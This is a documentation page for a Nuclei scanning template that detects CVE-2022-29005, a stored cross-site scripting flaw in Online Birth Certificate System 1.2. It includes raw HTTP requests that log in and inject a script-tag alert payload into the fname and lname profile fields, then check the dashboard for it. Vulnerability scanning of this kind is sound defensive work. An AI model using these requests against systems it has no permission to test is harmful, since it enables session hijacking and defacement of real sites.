Online Birth Certificate System 1.2 - Stored Cross-Site Scripting
ID: CVE-2022-29005
Severity: medium
Author: TenBird
Tags: cve,cve2022,xss,obcs,authenticated,phpgurukul
Description
Section titled “Description”Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.
YAML Source
Section titled “YAML Source”id: CVE-2022-29005
info: name: Online Birth Certificate System 1.2 - Stored Cross-Site Scripting author: TenBird severity: medium description: | Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ - https://nvd.nist.gov/vuln/detail/CVE-2022-29005 - http://online.com - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29005 cwe-id: CWE-79 epss-score: 0.00205 epss-percentile: 0.58459 cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: phpgurukul product: online_birth_certificate_system tags: cve,cve2022,xss,obcs,authenticated,phpgurukulvariables: str: "{{rand_base(6)}}"
http: - raw: - | POST /obcs/user/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
mobno={{username}}&password={{password}}&login= - | POST /obcs/user/profile.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
fname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit= - | GET /obcs/user/dashboard.php HTTP/1.1 Host: {{Hostname}}
host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'contains(header_3, "text/html")' - 'status_code_3 == 200' - contains(body_3, 'admin-name\">{{str}}<script>alert(document.domain);</script>') condition: and# digest: 490a0046304402207dabda35b4affc097d0f2aed1b1a00404accb6ff60c81ae020948b9f665cb7a6022003ec6d9dfd48c6b9de7ca6c92c5a58dc88d853054735f613514a310f5cb906c9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-29005.yaml"